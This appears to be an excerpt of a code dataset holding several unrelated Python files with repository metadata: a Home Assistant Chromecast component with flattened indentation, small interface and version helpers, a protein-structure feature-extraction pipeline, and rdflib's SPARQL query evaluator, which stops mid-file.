def media_pause(hass, entity_id=None):
""" Send the chromecast the command for play/pause. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_PAUSE, data)
def media_next_track(hass, entity_id=None):
""" Send the chromecast the command for next track. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_NEXT_TRACK, data)
def media_prev_track(hass, entity_id=None):
""" Send the chromecast the command for prev track. """
data = {components.ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.call_service(DOMAIN, components.SERVICE_MEDIA_PREV_TRACK, data)
# pylint: disable=too-many-locals, too-many-branches
def setup(hass, config):
""" Listen for chromecast events. """
logger = logging.getLogger(__name__)
try:
import pychromecast
except ImportError:
logger.exception(("Failed to import pychromecast. "
"Did you maybe not install the 'pychromecast' "
"dependency?"))
return False
if 'hosts' in config[DOMAIN]:
hosts = config[DOMAIN]['hosts'].split(",")
# If no hosts given, scan for chromecasts
else:
logger.info("Scanning for Chromecasts")
hosts = pychromecast.discover_chromecasts()
casts = {}
for host in hosts:
try:
cast = pychromecast.PyChromecast(host)
entity_id = util.ensure_unique_string(
ENTITY_ID_FORMAT.format(
util.slugify(cast.device.friendly_name)),
list(casts.keys()))
casts[entity_id] = cast
except pychromecast.ChromecastConnectionError:
pass
if not casts:
logger.error("Could not find Chromecasts")
return False
def update_chromecast_state(entity_id, chromecast):
""" Retrieve state of Chromecast and update statemachine. """
chromecast.refresh()
status = chromecast.app
state_attr = {components.ATTR_FRIENDLY_NAME:
chromecast.device.friendly_name}
if status and status.app_id != pychromecast.APP_ID['HOME']:
state = status.app_id
ramp = chromecast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp and ramp.state != pychromecast.RAMP_STATE_UNKNOWN:
if ramp.state == pychromecast.RAMP_STATE_PLAYING:
state_attr[ATTR_MEDIA_STATE] = MEDIA_STATE_PLAYING
else:
state_attr[ATTR_MEDIA_STATE] = MEDIA_STATE_STOPPED
if ramp.content_id:
state_attr[ATTR_MEDIA_CONTENT_ID] = ramp.content_id
if ramp.title:
state_attr[ATTR_MEDIA_TITLE] = ramp.title
if ramp.artist:
state_attr[ATTR_MEDIA_ARTIST] = ramp.artist
if ramp.album:
state_attr[ATTR_MEDIA_ALBUM] = ramp.album
if ramp.image_url:
state_attr[ATTR_MEDIA_IMAGE_URL] = ramp.image_url
if ramp.duration:
state_attr[ATTR_MEDIA_DURATION] = ramp.duration
state_attr[ATTR_MEDIA_VOLUME] = ramp.volume
else:
state = STATE_NO_APP
hass.states.set(entity_id, state, state_attr)
def update_chromecast_states(time): # pylint: disable=unused-argument
""" Updates all chromecast states. """
logger.info("Updating Chromecast status")
for entity_id, cast in casts.items():
update_chromecast_state(entity_id, cast)
def _service_to_entities(service):
""" Helper method to get entities from service. """
entity_ids = components.extract_entity_ids(hass, service)
if entity_ids:
for entity_id in entity_ids:
cast = casts.get(entity_id)
if cast:
yield entity_id, cast
else:
yield from casts.items()
def turn_off_service(service):
""" Service to exit any running app on the specified ChromeCast and
shows idle screen. Will quit all ChromeCasts if nothing specified.
"""
for entity_id, cast in _service_to_entities(service):
cast.quit_app()
update_chromecast_state(entity_id, cast)
def volume_up_service(service):
""" Service to send the chromecast the command for volume up. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp:
ramp.volume_up()
def volume_down_service(service):
""" Service to send the chromecast the command for volume down. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp:
ramp.volume_down()
def media_play_pause_service(service):
""" Service to send the chromecast the command for play/pause. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp:
ramp.playpause()
def media_play_service(service):
""" Service to send the chromecast the command for play/pause. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp and ramp.state == pychromecast.RAMP_STATE_STOPPED:
ramp.playpause()
def media_pause_service(service):
""" Service to send the chromecast the command for play/pause. """
for _, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp and ramp.state == pychromecast.RAMP_STATE_PLAYING:
ramp.playpause()
def media_next_track_service(service):
""" Service to send the chromecast the command for next track. """
for entity_id, cast in _service_to_entities(service):
ramp = cast.get_protocol(pychromecast.PROTOCOL_RAMP)
if ramp:
next(ramp)
update_chromecast_state(entity_id, cast)
def play_youtube_video_service(service, video_id):
""" Plays specified video_id on the Chromecast's YouTube channel. """
        if video_id:  # skip when service.data.get('video') returned None
for entity_id, cast in _service_to_entities(service):
pychromecast.play_youtube_video(video_id, cast.host)
update_chromecast_state(entity_id, cast)
hass.track_time_change(update_chromecast_states)
hass.services.register(DOMAIN, components.SERVICE_TURN_OFF,
turn_off_service)
hass.services.register(DOMAIN, components.SERVICE_VOLUME_UP,
volume_up_service)
hass.services.register(DOMAIN, components.SERVICE_VOLUME_DOWN,
volume_down_service)
hass.services.register(DOMAIN, components.SERVICE_MEDIA_PLAY_PAUSE,
media_play_pause_service)
hass.services.register(DOMAIN, components.SERVICE_MEDIA_PLAY,
media_play_service)
hass.services.register(DOMAIN, components.SERVICE_MEDIA_PAUSE,
media_pause_service)
hass.services.register(DOMAIN, components.SERVICE_MEDIA_NEXT_TRACK,
media_next_track_service)
hass.services.register(DOMAIN, "start_fireplace",
lambda service:
play_youtube_video_service(service, "eyU3bRy2x44"))
hass.services.register(DOMAIN, "start_epic_sax",
lambda service:
play_youtube_video_service(service, "kxopViU98Xo"))
hass.services.register(DOMAIN, SERVICE_YOUTUBE_VIDEO,
lambda service:
play_youtube_video_service(service,
service.data.get(
'video')))
update_chromecast_states(None)
return True
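# --- Illustrative usage sketch (not part of the original source) ---
# Exercises the module-level helpers above against a hypothetical Home
# Assistant core object and a hypothetical chromecast entity id.
def _example_cast_control(hass):
    entity_id = 'chromecast.living_room'  # hypothetical entity id
    if is_on(hass, entity_id):
        volume_down(hass, entity_id)
        media_pause(hass, entity_id)
        turn_off(hass, entity_id)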
| 34.028662
| 78
| 0.644829
|
c72f016e7458965deca5b1633129b7537259ff63
| 263
|
py
|
Python
|
interface/caller.py
|
hhaensel/MolecularGraph.jl
|
c54ccdf09274e36ed3d866604f99b497a39bfaf5
|
[
"MIT"
] | 126
|
2019-01-28T06:54:27.000Z
|
2022-03-22T08:45:46.000Z
|
interface/caller.py
|
timholy/MolecularGraph.jl
|
90d6f6175f30023ffce92d9bbc386f8659866508
|
[
"MIT"
] | 64
|
2019-04-19T03:33:52.000Z
|
2022-03-22T23:34:44.000Z
|
interface/caller.py
|
timholy/MolecularGraph.jl
|
90d6f6175f30023ffce92d9bbc386f8659866508
|
[
"MIT"
] | 30
|
2019-02-07T04:08:52.000Z
|
2022-03-22T03:33:20.000Z
|
from ctypes import CDLL, c_char_p
JL = CDLL("invokejulia.so")
JL.smilestomol.argtypes = [c_char_p]
print(JL.smilestomol("CCC(=O)CCO".encode()))
"""
def mol_to_svg(mol):
JL.smilestomol.argtypes = None # Pointer to MolGraph
return JL.moltosvg(mol)
"""
| 18.785714
| 57
| 0.69962
|
bc7baf86b04992f12a4f38c4c8790ca7e44940ec
| 232
|
py
|
Python
|
mmp/cli/utils.py
|
alfonsocv12/mpip
|
972aca21916a6037a1656780e844a93070613d07
|
[
"MIT"
] | 3
|
2021-04-25T16:39:21.000Z
|
2021-04-28T22:17:44.000Z
|
mmp/cli/utils.py
|
alfonsocv12/mpip
|
972aca21916a6037a1656780e844a93070613d07
|
[
"MIT"
] | null | null | null |
mmp/cli/utils.py
|
alfonsocv12/mpip
|
972aca21916a6037a1656780e844a93070613d07
|
[
"MIT"
] | null | null | null |
import os
import mmp
def get_version_info(scope):
versioninfo = 'mmp version {}'.format(mmp.__version__)
if scope == 'mmp':
return versioninfo
raise ValueError("{} is not a valid version scope".format(scope))
| 21.090909
| 69
| 0.681034
|
ad43d6bdb56ff582e14ff9008aaaea727501ad6e
| 11,505
|
py
|
Python
|
MindSPONGE/mindsponge/fold/eval/data/feature/feature_extraction.py
|
mindspore-ai/mindscience
|
b5269245915695de2d99fb290fef662c241db189
|
[
"Apache-2.0"
] | 3
|
2021-11-10T06:17:50.000Z
|
2022-03-21T14:25:30.000Z
|
MindSPONGE/tests/fold_test/data/feature/feature_extraction.py
|
mindspore-ai/mindscience
|
b5269245915695de2d99fb290fef662c241db189
|
[
"Apache-2.0"
] | null | null | null |
MindSPONGE/tests/fold_test/data/feature/feature_extraction.py
|
mindspore-ai/mindscience
|
b5269245915695de2d99fb290fef662c241db189
|
[
"Apache-2.0"
] | 1
|
2021-12-05T11:41:29.000Z
|
2021-12-05T11:41:29.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""feature extraction"""
import copy
import numpy as np
from commons import residue_constants
from data.feature import data_transforms
NUM_RES = "num residues placeholder"
NUM_SEQ = "length msa placeholder"
NUM_TEMPLATES = "num templates placeholder"
FEATURES = {
"aatype": (np.float32, [NUM_RES, 21]),
"between_segment_residues": (np.int64, [NUM_RES, 1]),
"deletion_matrix": (np.float32, [NUM_SEQ, NUM_RES, 1]),
"msa": (np.int64, [NUM_SEQ, NUM_RES, 1]),
"num_alignments": (np.int64, [NUM_RES, 1]),
"residue_index": (np.int64, [NUM_RES, 1]),
"seq_length": (np.int64, [NUM_RES, 1]),
"all_atom_positions": (np.float32, [NUM_RES, residue_constants.atom_type_num, 3]),
"all_atom_mask": (np.int64, [NUM_RES, residue_constants.atom_type_num]),
"resolution": (np.float32, [1]),
"template_domain_names": (str, [NUM_TEMPLATES]),
"template_sum_probs": (np.float32, [NUM_TEMPLATES, 1]),
"template_aatype": (np.float32, [NUM_TEMPLATES, NUM_RES, 22]),
"template_all_atom_positions": (np.float32, [NUM_TEMPLATES, NUM_RES, residue_constants.atom_type_num, 3]),
"template_all_atom_masks": (np.float32, [NUM_TEMPLATES, NUM_RES, residue_constants.atom_type_num, 1]),
}
def nonensembled_map_fns(data_config):
"""Input pipeline functions which are not ensembled."""
common_cfg = data_config.common
map_fns = [
data_transforms.correct_msa_restypes,
data_transforms.add_distillation_flag(False),
data_transforms.cast_64bit_ints,
data_transforms.squeeze_features,
data_transforms.randomly_replace_msa_with_unknown(0.0),
data_transforms.make_seq_mask,
data_transforms.make_msa_mask,
data_transforms.make_hhblits_profile,
data_transforms.make_random_crop_to_size_seed,
]
if common_cfg.use_templates:
map_fns.extend([data_transforms.fix_templates_aatype, data_transforms.make_pseudo_beta('template_')])
map_fns.extend([data_transforms.make_atom14_masks,])
return map_fns
def ensembled_map_fns(data_config):
"""Input pipeline functions that can be ensembled and averaged."""
common_cfg = data_config.common
eval_cfg = data_config.eval
map_fns = []
if common_cfg.reduce_msa_clusters_by_max_templates:
pad_msa_clusters = eval_cfg.max_msa_clusters - eval_cfg.max_templates
else:
pad_msa_clusters = eval_cfg.max_msa_clusters
max_msa_clusters = pad_msa_clusters
max_extra_msa = common_cfg.max_extra_msa
map_fns.append(data_transforms.sample_msa(max_msa_clusters, keep_extra=True))
if 'masked_msa' in common_cfg:
map_fns.append(data_transforms.make_masked_msa(common_cfg.masked_msa, eval_cfg.masked_msa_replace_fraction))
if common_cfg.msa_cluster_features:
map_fns.append(data_transforms.nearest_neighbor_clusters())
map_fns.append(data_transforms.summarize_clusters())
if max_extra_msa:
map_fns.append(data_transforms.crop_extra_msa(max_extra_msa))
else:
map_fns.append(data_transforms.delete_extra_msa)
map_fns.append(data_transforms.make_msa_feat())
crop_feats = dict(eval_cfg.feat)
if eval_cfg.fixed_size:
map_fns.append(data_transforms.select_feat(list(crop_feats)))
map_fns.append(data_transforms.random_crop_to_size(
eval_cfg.crop_size,
eval_cfg.max_templates,
crop_feats,
eval_cfg.subsample_templates))
map_fns.append(data_transforms.make_fixed_size(
crop_feats,
pad_msa_clusters,
common_cfg.max_extra_msa,
eval_cfg.crop_size,
eval_cfg.max_templates))
else:
map_fns.append(data_transforms.crop_templates(eval_cfg.max_templates))
return map_fns
def process_arrays_from_config(arrays, data_config):
"""Apply filters and maps to an existing dataset, based on the config."""
def wrap_ensemble_fn(data, i):
"""Function to be mapped over the ensemble dimension."""
d = data.copy()
fns = ensembled_map_fns(data_config)
fn = data_transforms.compose(fns)
d['ensemble_index'] = i
return fn(d)
eval_cfg = data_config.eval
arrays = data_transforms.compose(nonensembled_map_fns(data_config))(arrays)
arrays_0 = wrap_ensemble_fn(arrays, np.array(0, np.int32))
num_ensemble = eval_cfg.num_ensemble
if data_config.common.resample_msa_in_recycling:
num_ensemble *= data_config.common.num_recycle + 1
result_array = {x: () for x in arrays_0.keys()}
if num_ensemble > 1:
for i in range(num_ensemble):
arrays_t = wrap_ensemble_fn(arrays, np.array(i, np.int32))
for key in arrays_0.keys():
result_array[key] += (arrays_t[key][None],)
for key in arrays_0.keys():
result_array[key] = np.concatenate(result_array[key], axis=0)
else:
result_array = {key: arrays_0[key][None] for key in arrays_0.keys()}
return result_array
def feature_shape(feature_name,
num_residues,
msa_length,
num_templates,
features=None):
"""Get the shape for the given feature name."""
features = features or FEATURES
if feature_name.endswith("_unnormalized"):
feature_name = feature_name[:-13]
unused_dtype, raw_sizes = features[feature_name]
replacements = {NUM_RES: num_residues,
NUM_SEQ: msa_length}
if num_templates is not None:
replacements[NUM_TEMPLATES] = num_templates
sizes = [replacements.get(dimension, dimension) for dimension in raw_sizes]
for dimension in sizes:
if isinstance(dimension, str):
raise ValueError("Could not parse %s (shape: %s) with values: %s" % (
feature_name, raw_sizes, replacements))
size_r = [int(x) for x in sizes]
return size_r
def parse_reshape_logic(parsed_features, features, num_template, key=None):
"""Transforms parsed serial features to the correct shape."""
num_residues = np.reshape(parsed_features['seq_length'].astype(np.int32), (-1,))[0]
if "num_alignments" in parsed_features:
num_msa = np.reshape(parsed_features["num_alignments"].astype(np.int32), (-1,))[0]
else:
num_msa = 0
if key is not None and "key" in features:
parsed_features["key"] = [key] # Expand dims from () to (1,).
for k, v in parsed_features.items():
new_shape = feature_shape(
feature_name=k,
num_residues=num_residues,
msa_length=num_msa,
num_templates=num_template,
features=features)
new_shape_size = 1
for dim in new_shape:
new_shape_size *= dim
if np.size(v) != new_shape_size:
raise ValueError("the size of feature {} ({}) could not be reshaped into {}"
"".format(k, np.size(v), new_shape))
if "template" not in k:
if np.size(v) <= 0:
raise ValueError("The feature {} is not empty.".format(k))
parsed_features[k] = np.reshape(v, new_shape)
return parsed_features
def _make_features_metadata(feature_names):
"""Makes a feature name to type and shape mapping from a list of names."""
required_features = ["sequence", "domain_name", "template_domain_names"]
feature_names = list(set(feature_names) - set(required_features))
features_metadata = {name: FEATURES[name] for name in feature_names}
return features_metadata
def np_to_array_dict(np_example, features):
"""Creates dict of arrays."""
features_metadata = _make_features_metadata(features)
array_dict = {k: v for k, v in np_example.items() if k in features_metadata}
if "template_domain_names" in np_example:
num_template = len(np_example["template_domain_names"])
else:
num_template = 0
array_dict = parse_reshape_logic(array_dict, features_metadata, num_template)
array_dict['template_mask'] = np.ones([num_template], np.float32)
return array_dict
def make_data_config(config, num_res):
"""Makes a data config for the input pipeline."""
cfg = copy.deepcopy(config.data)
feature_names = cfg.common.unsupervised_features
if cfg.common.use_templates:
feature_names += cfg.common.template_features
with cfg.unlocked():
cfg.eval.crop_size = num_res
return cfg, feature_names
def custom_padding(config, arrays, dims):
"""Pad array to fixed size."""
step_size = config.seq_length
res_length = arrays[0].shape[dims[0]]
padding_size = step_size - res_length
for i, arr in enumerate(arrays):
if dims[i] == -1:
continue
extra_array_shape = list(arr.shape)
extra_array_shape[dims[i]] = padding_size
extra_array = np.zeros(extra_array_shape, dtype=arr.dtype)
arrays[i] = np.concatenate((arr, extra_array), axis=dims[i])
return arrays
def process_features(raw_features, config, global_config):
"""Preprocesses NumPy feature dict using pipeline."""
num_res = int(raw_features['seq_length'][0])
cfg, feature_names = make_data_config(config, num_res=num_res)
if 'deletion_matrix_int' in raw_features:
raw_features['deletion_matrix'] = (raw_features.pop('deletion_matrix_int').astype(np.float32))
array_dict = np_to_array_dict(np_example=raw_features, features=feature_names)
features = process_arrays_from_config(array_dict, cfg)
features = {k: v for k, v in features.items() if v.dtype != 'O'}
extra_msa_length = global_config.extra_msa_length
ori_res_length = features["target_feat"].shape[1]
aatype = features["aatype"]
residue_index = features["residue_index"]
for key in ["extra_msa", "extra_has_deletion", "extra_deletion_value", "extra_msa_mask"]:
features[key] = features[key][:, :extra_msa_length]
input_keys = ['target_feat', 'msa_feat', 'msa_mask', 'seq_mask', 'aatype', 'template_aatype',
'template_all_atom_masks', 'template_all_atom_positions', 'template_mask',
'template_pseudo_beta_mask', 'template_pseudo_beta', 'template_sum_probs',
'extra_msa', 'extra_has_deletion', 'extra_deletion_value', 'extra_msa_mask',
'residx_atom37_to_atom14', 'atom37_atom_exists', 'residue_index']
arrays = [features[key] for key in input_keys]
dims = [1, 2, 2, 1, 1, 2, 2, 2, -1, 2, 2, -1, 2, 2, 2, 2, 1, 1, 1]
arrays = custom_padding(global_config, arrays, dims)
arrays = [array.astype(np.float16) if array.dtype == "float64" else array for array in arrays]
arrays = [array.astype(np.float16) if array.dtype == "float32" else array for array in arrays]
return arrays, aatype, residue_index, ori_res_length
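# --- Illustrative sketch (not part of the original source) ---
# Demonstrates custom_padding on toy arrays, assuming a hypothetical config
# object whose seq_length is the fixed crop size; the padding size is derived
# from the first array's dimension and applied to each array along its own axis.
class _DemoGlobalConfig:
    seq_length = 8  # hypothetical fixed sequence length

_demo_arrays = custom_padding(_DemoGlobalConfig, [np.ones((4, 5)), np.ones((3, 4, 2))], [0, 1])
assert _demo_arrays[0].shape == (8, 5)
assert _demo_arrays[1].shape == (3, 8, 2)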
| 39
| 116
| 0.68405
|
34fe41e9038d0d873911be7cfdd5e5744c18cbd7
| 15,986
|
py
|
Python
|
rdflib/plugins/sparql/evaluate.py
|
tonyfast/rdflib
|
e4fe0fdbd4de7e1183418f302315b51a14602e03
|
[
"BSD-3-Clause"
] | 2
|
2021-02-06T17:36:05.000Z
|
2021-04-21T07:33:39.000Z
|
rdflib/plugins/sparql/evaluate.py
|
pragya16067/rdflib
|
6b5bd37ccc67bdec62d2e36d174eb7933b5020b2
|
[
"BSD-3-Clause"
] | 2
|
2020-05-09T15:03:57.000Z
|
2020-05-30T10:51:40.000Z
|
rdflib/plugins/sparql/evaluate.py
|
pragya16067/rdflib
|
6b5bd37ccc67bdec62d2e36d174eb7933b5020b2
|
[
"BSD-3-Clause"
] | 4
|
2020-05-08T08:36:19.000Z
|
2020-05-28T07:23:23.000Z
|
"""
These methods recursively evaluate the SPARQL Algebra.
evalQuery is the entry point: it sets up the context and
returns the SPARQLResult object.
evalPart is called on each level and delegates to the right method.
An rdflib.plugins.sparql.sparql.QueryContext is passed along, keeping
the information needed for evaluation.
A list of dicts (solution mappings) is returned, apart from GroupBy, which may
also return a dict of lists of dicts.
"""
import collections
import itertools
import re
import requests
from pyparsing import ParseException
from rdflib import Variable, Graph, BNode, URIRef, Literal
from rdflib.plugins.sparql import CUSTOM_EVALS
from rdflib.plugins.sparql.parserutils import value
from rdflib.plugins.sparql.sparql import (
QueryContext,
AlreadyBound,
FrozenBindings,
Bindings,
SPARQLError,
)
from rdflib.plugins.sparql.evalutils import (
_filter,
_eval,
_join,
_diff,
_minus,
_fillTemplate,
_ebv,
_val,
)
from rdflib.plugins.sparql.aggregates import Aggregator
from rdflib.plugins.sparql import parser
def evalBGP(ctx, bgp):
"""
A basic graph pattern
"""
if not bgp:
yield ctx.solution()
return
s, p, o = bgp[0]
_s = ctx[s]
_p = ctx[p]
_o = ctx[o]
for ss, sp, so in ctx.graph.triples((_s, _p, _o)):
if None in (_s, _p, _o):
c = ctx.push()
else:
c = ctx
if _s is None:
c[s] = ss
try:
if _p is None:
c[p] = sp
except AlreadyBound:
continue
try:
if _o is None:
c[o] = so
except AlreadyBound:
continue
for x in evalBGP(c, bgp[1:]):
yield x
def evalExtend(ctx, extend):
# TODO: Deal with dict returned from evalPart from GROUP BY
for c in evalPart(ctx, extend.p):
try:
e = _eval(extend.expr, c.forget(ctx, _except=extend._vars))
if isinstance(e, SPARQLError):
raise e
yield c.merge({extend.var: e})
except SPARQLError:
yield c
def evalLazyJoin(ctx, join):
"""
A lazy join will push the variables bound
in the first part to the second part,
essentially doing the join implicitly
hopefully evaluating much fewer triples
"""
for a in evalPart(ctx, join.p1):
c = ctx.thaw(a)
for b in evalPart(c, join.p2):
yield b.merge(a) # merge, as some bindings may have been forgotten
def evalJoin(ctx, join):
# TODO: Deal with dict returned from evalPart from GROUP BY
# only ever for join.p1
if join.lazy:
return evalLazyJoin(ctx, join)
else:
a = evalPart(ctx, join.p1)
b = set(evalPart(ctx, join.p2))
return _join(a, b)
def evalUnion(ctx, union):
branch1_branch2 = []
for x in evalPart(ctx, union.p1):
branch1_branch2.append(x)
for x in evalPart(ctx, union.p2):
branch1_branch2.append(x)
return branch1_branch2
def evalMinus(ctx, minus):
a = evalPart(ctx, minus.p1)
b = set(evalPart(ctx, minus.p2))
return _minus(a, b)
def evalLeftJoin(ctx, join):
# import pdb; pdb.set_trace()
for a in evalPart(ctx, join.p1):
ok = False
c = ctx.thaw(a)
for b in evalPart(c, join.p2):
if _ebv(join.expr, b.forget(ctx)):
ok = True
yield b
if not ok:
# we've cheated, the ctx above may contain
# vars bound outside our scope
# before we yield a solution without the OPTIONAL part
# check that we would have had no OPTIONAL matches
# even without prior bindings...
p1_vars = join.p1._vars
if p1_vars is None or not any(
_ebv(join.expr, b)
for b in evalPart(ctx.thaw(a.remember(p1_vars)), join.p2)
):
yield a
def evalFilter(ctx, part):
# TODO: Deal with dict returned from evalPart!
for c in evalPart(ctx, part.p):
if _ebv(
part.expr,
c.forget(ctx, _except=part._vars) if not part.no_isolated_scope else c,
):
yield c
def evalGraph(ctx, part):
if ctx.dataset is None:
raise Exception(
"Non-conjunctive-graph doesn't know about "
+ "graphs. Try a query without GRAPH."
)
ctx = ctx.clone()
graph = ctx[part.term]
if graph is None:
for graph in ctx.dataset.contexts():
# in SPARQL the default graph is NOT a named graph
if graph == ctx.dataset.default_context:
continue
c = ctx.pushGraph(graph)
c = c.push()
graphSolution = [{part.term: graph.identifier}]
for x in _join(evalPart(c, part.p), graphSolution):
yield x
else:
c = ctx.pushGraph(ctx.dataset.get_context(graph))
for x in evalPart(c, part.p):
yield x
def evalValues(ctx, part):
for r in part.p.res:
c = ctx.push()
try:
for k, v in r.items():
if v != "UNDEF":
c[k] = v
except AlreadyBound:
continue
yield c.solution()
def evalMultiset(ctx, part):
if part.p.name == "values":
return evalValues(ctx, part)
return evalPart(ctx, part.p)
def evalPart(ctx, part):
# try custom evaluation functions
for name, c in CUSTOM_EVALS.items():
try:
return c(ctx, part)
except NotImplementedError:
            pass  # the given custom evaluation function did not handle this part
if part.name == "BGP":
# Reorder triples patterns by number of bound nodes in the current ctx
# Do patterns with more bound nodes first
triples = sorted(
part.triples, key=lambda t: len([n for n in t if ctx[n] is None])
)
return evalBGP(ctx, triples)
elif part.name == "Filter":
return evalFilter(ctx, part)
elif part.name == "Join":
return evalJoin(ctx, part)
elif part.name == "LeftJoin":
return evalLeftJoin(ctx, part)
elif part.name == "Graph":
return evalGraph(ctx, part)
elif part.name == "Union":
return evalUnion(ctx, part)
elif part.name == "ToMultiSet":
return evalMultiset(ctx, part)
elif part.name == "Extend":
return evalExtend(ctx, part)
elif part.name == "Minus":
return evalMinus(ctx, part)
elif part.name == "Project":
return evalProject(ctx, part)
elif part.name == "Slice":
return evalSlice(ctx, part)
elif part.name == "Distinct":
return evalDistinct(ctx, part)
elif part.name == "Reduced":
return evalReduced(ctx, part)
elif part.name == "OrderBy":
return evalOrderBy(ctx, part)
elif part.name == "Group":
return evalGroup(ctx, part)
elif part.name == "AggregateJoin":
return evalAggregateJoin(ctx, part)
elif part.name == "SelectQuery":
return evalSelectQuery(ctx, part)
elif part.name == "AskQuery":
return evalAskQuery(ctx, part)
elif part.name == "ConstructQuery":
return evalConstructQuery(ctx, part)
elif part.name == "ServiceGraphPattern":
return evalServiceQuery(ctx, part)
# raise Exception('ServiceGraphPattern not implemented')
elif part.name == "DescribeQuery":
raise Exception("DESCRIBE not implemented")
else:
raise Exception("I dont know: %s" % part.name)
def evalServiceQuery(ctx, part):
res = {}
match = re.match(
"^service <(.*)>[ \n]*{(.*)}[ \n]*$",
part.get("service_string", ""),
re.DOTALL | re.I,
)
if match:
service_url = match.group(1)
service_query = _buildQueryStringForServiceCall(ctx, match)
query_settings = {"query": service_query, "output": "json"}
headers = {
"accept": "application/sparql-results+json",
"user-agent": "rdflibForAnUser",
}
        # GET is easier to cache, so prefer it if the query is not too long
if len(service_query) < 600:
response = requests.get(service_url, params=query_settings, headers=headers)
else:
response = requests.post(
service_url, params=query_settings, headers=headers
)
if response.status_code == 200:
json = response.json()
variables = res["vars_"] = json["head"]["vars"]
# or just return the bindings?
res = json["results"]["bindings"]
if len(res) > 0:
for r in res:
for bound in _yieldBindingsFromServiceCallResult(ctx, r, variables):
yield bound
else:
            raise Exception(
                "Service: %s responded with code: %s"
                % (service_url, response.status_code)
            )
"""
Build a query string to be used by the service call.
It is supposed to pass in the existing bound solutions.
Re-adds prefixes if added and sets the base.
Wraps it in select if needed.
"""
def _buildQueryStringForServiceCall(ctx, match):
service_query = match.group(2)
try:
parser.parseQuery(service_query)
except ParseException:
# This could be because we don't have a select around the service call.
service_query = "SELECT REDUCED * WHERE {" + service_query + "}"
for p in ctx.prologue.namespace_manager.store.namespaces():
service_query = "PREFIX " + p[0] + ":" + p[1].n3() + " " + service_query
    # re-add the base if one was defined
base = ctx.prologue.base
if base is not None and len(base) > 0:
service_query = "BASE <" + base + "> " + service_query
sol = ctx.solution()
if len(sol) > 0:
variables = " ".join(map(lambda v: v.n3(), sol))
variables_bound = " ".join(map(lambda v: ctx.get(v).n3(), sol))
service_query = (
service_query + "VALUES (" + variables + ") {(" + variables_bound + ")}"
)
return service_query
def _yieldBindingsFromServiceCallResult(ctx, r, variables):
res_dict = {}
for var in variables:
if var in r and r[var]:
if r[var]["type"] == "uri":
res_dict[Variable(var)] = URIRef(r[var]["value"])
elif r[var]["type"] == "bnode":
res_dict[Variable(var)] = BNode(r[var]["value"])
elif r[var]["type"] == "literal" and "datatype" in r[var]:
res_dict[Variable(var)] = Literal(
r[var]["value"], datatype=r[var]["datatype"]
)
elif r[var]["type"] == "literal" and "xml:lang" in r[var]:
res_dict[Variable(var)] = Literal(
r[var]["value"], lang=r[var]["xml:lang"]
)
yield FrozenBindings(ctx, res_dict)
def evalGroup(ctx, group):
"""
http://www.w3.org/TR/sparql11-query/#defn_algGroup
"""
# grouping should be implemented by evalAggregateJoin
return evalPart(ctx, group.p)
def evalAggregateJoin(ctx, agg):
# import pdb ; pdb.set_trace()
p = evalPart(ctx, agg.p)
# p is always a Group, we always get a dict back
group_expr = agg.p.expr
res = collections.defaultdict(lambda: Aggregator(aggregations=agg.A))
if group_expr is None:
# no grouping, just COUNT in SELECT clause
# get 1 aggregator for counting
aggregator = res[True]
for row in p:
aggregator.update(row)
else:
for row in p:
# determine right group aggregator for row
k = tuple(_eval(e, row, False) for e in group_expr)
res[k].update(row)
# all rows are done; yield aggregated values
for aggregator in res.values():
yield FrozenBindings(ctx, aggregator.get_bindings())
# there were no matches
if len(res) == 0:
yield FrozenBindings(ctx)
def evalOrderBy(ctx, part):
res = evalPart(ctx, part.p)
for e in reversed(part.expr):
reverse = bool(e.order and e.order == "DESC")
res = sorted(
res, key=lambda x: _val(value(x, e.expr, variables=True)), reverse=reverse
)
return res
def evalSlice(ctx, slice):
res = evalPart(ctx, slice.p)
return itertools.islice(
res,
slice.start,
slice.start + slice.length if slice.length is not None else None,
)
def evalReduced(ctx, part):
"""apply REDUCED to result
REDUCED is not as strict as DISTINCT, but if the incoming rows were sorted
it should produce the same result with limited extra memory and time per
incoming row.
"""
# This implementation uses a most recently used strategy and a limited
# buffer size. It relates to a LRU caching algorithm:
# https://en.wikipedia.org/wiki/Cache_algorithms#Least_Recently_Used_.28LRU.29
MAX = 1
# TODO: add configuration or determine "best" size for most use cases
# 0: No reduction
# 1: compare only with the last row, almost no reduction with
# unordered incoming rows
# N: The greater the buffer size the greater the reduction but more
# memory and time are needed
# mixed data structure: set for lookup, deque for append/pop/remove
mru_set = set()
mru_queue = collections.deque()
for row in evalPart(ctx, part.p):
if row in mru_set:
# forget last position of row
mru_queue.remove(row)
else:
# row seems to be new
yield row
mru_set.add(row)
if len(mru_set) > MAX:
# drop the least recently used row from buffer
mru_set.remove(mru_queue.pop())
# put row to the front
mru_queue.appendleft(row)
def evalDistinct(ctx, part):
res = evalPart(ctx, part.p)
done = set()
for x in res:
if x not in done:
yield x
done.add(x)
def evalProject(ctx, project):
res = evalPart(ctx, project.p)
return (row.project(project.PV) for row in res)
def evalSelectQuery(ctx, query):
res = {}
res["type_"] = "SELECT"
res["bindings"] = evalPart(ctx, query.p)
res["vars_"] = query.PV
return res
def evalAskQuery(ctx, query):
res = {}
res["type_"] = "ASK"
res["askAnswer"] = False
for x in evalPart(ctx, query.p):
res["askAnswer"] = True
break
return res
def evalConstructQuery(ctx, query):
